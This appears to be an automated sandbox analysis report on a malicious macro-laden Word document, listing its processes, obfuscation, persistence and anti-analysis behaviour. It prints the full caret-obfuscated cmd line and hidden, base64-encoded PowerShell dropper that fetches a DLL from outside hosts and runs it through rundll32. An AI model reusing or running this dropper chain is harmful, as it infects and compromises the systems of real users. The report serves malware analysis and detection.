Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A3F9F 10_2_003A3F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A1B9C 10_2_003A1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A7D8A 10_2_003A7D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AED87 10_2_003AED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AC587 10_2_003AC587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BE985 10_2_003BE985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AB5F1 10_2_003AB5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003B7BDC 10_2_003B7BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A4DCA 10_2_003A4DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A0BCC 10_2_003A0BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003AC9C0 10_2_003AC9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003BB5C0 10_2_003BB5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003EC83F 11_2_003EC83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D923C 11_2_003D923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D542D 11_2_003D542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E502C 11_2_003E502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D4C27 11_2_003D4C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003EBC21 11_2_003EBC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003EC014 11_2_003EC014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D8217 11_2_003D8217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E3C07 11_2_003E3C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D8A60 11_2_003D8A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003DBC63 11_2_003DBC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003ED45C 11_2_003ED45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E3856 11_2_003E3856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D9055 11_2_003D9055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003DC652 11_2_003DC652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E10BB 11_2_003E10BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E60B9 11_2_003E60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003DC0B6 11_2_003DC0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D16B2 11_2_003D16B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D3E9E 11_2_003D3E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003EB499 11_2_003EB499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003ED099 11_2_003ED099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E188F 11_2_003E188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E4689 11_2_003E4689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003DC485 11_2_003DC485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E32F0 11_2_003E32F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E72F1 11_2_003E72F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003ED2EC 11_2_003ED2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E6AE4 11_2_003E6AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E10E5 11_2_003E10E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E04E1 11_2_003E04E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E5CDF 11_2_003E5CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E1ED9 11_2_003E1ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E84D9 11_2_003E84D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E5AC3 11_2_003E5AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D32C2 11_2_003D32C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003E893D 11_2_003E893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003D6134 11_2_003D6134
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: ARCH_25_012021.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: ARCH_25_012021.doc OLE indicator, VBA macros: true
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
PE file contains strange resources
Source: N49I.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: rundll32.exe, 00000006.00000002.2095088979.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2092610452.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2094682788.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2096129935.0000000001D70000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/8@1/5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002834DF CreateToolhelp32Snapshot, 16_2_002834DF
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$CH_25_012021.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp
Source: ARCH_25_012021.doc OLE indicator, Word Document stream: true
Source: ARCH_25_012021.doc OLE document summary: edited time not present or 0
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: ARCH_25_012021.doc Virustotal: Detection: 16%
Source: ARCH_25_012021.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBS
ACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: ARCH_25_012021.doc Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_ Name: Gusca95luq_
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF00270ED3 push E0000000h; ret 5_2_000007FF00270FF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FF0027100A push E0000000h; ret 5_2_000007FF00270FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242D98 push 00242E25h; ret 7_2_00242E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250020 push 00250058h; ret 7_2_00250050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244038 push 00244064h; ret 7_2_0024405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021A0B2 push 0021A0E0h; ret 7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021A0B4 push 0021A0E0h; ret 7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021B274 push 0021B2CDh; ret 7_2_0021B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0022C34C push 0022C378h; ret 7_2_0022C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021E450 push ecx; mov dword ptr [esp], edx 7_2_0021E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250498 push 002504EFh; ret 7_2_002504E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002504F4 push 0025055Ch; ret 7_2_00250554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002505B8 push 002505E4h; ret 7_2_002505DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250580 push 002505ACh; ret 7_2_002505A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024B588 push 0024B5CAh; ret 7_2_0024B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002505F0 push 0025063Ch; ret 7_2_00250634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250654 push 00250680h; ret 7_2_00250678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025068C push 002506B8h; ret 7_2_002506B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021E696 push ecx; mov dword ptr [esp], edx 7_2_0021E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021E6F0 push ecx; mov dword ptr [esp], edx 7_2_0021E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002506C4 push 002506F0h; ret 7_2_002506E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021D6DC push 0021D751h; ret 7_2_0021D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00218748 push 00218774h; ret 7_2_0021876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021E750 push ecx; mov dword ptr [esp], edx 7_2_0021E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021D754 push 0021D7ADh; ret 7_2_0021D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002537A8 push 002537E0h; ret 7_2_002537D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00218798 push 002187C4h; ret 7_2_002187BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002507E4 push 00250827h; ret 7_2_0025081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250834 push 00250860h; ret 7_2_00250858
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025086C push 00250898h; ret 7_2_00250890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00253848 push 00253874h; ret 7_2_0025386C

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Kizmwn\teeko.fjq

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Kizmwn\teeko.fjq:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 00000008.00000002.2094600564.00000000007CD000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001F1D4D mov eax, dword ptr fs:[00000030h] 7_2_001F1D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002912C1 mov eax, dword ptr fs:[00000030h] 7_2_002912C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00411D4D mov eax, dword ptr fs:[00000030h] 8_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_007112C1 mov eax, dword ptr fs:[00000030h] 8_2_007112C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001812C1 mov eax, dword ptr fs:[00000030h] 9_2_001812C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_003A12C1 mov eax, dword ptr fs:[00000030h] 10_2_003A12C1
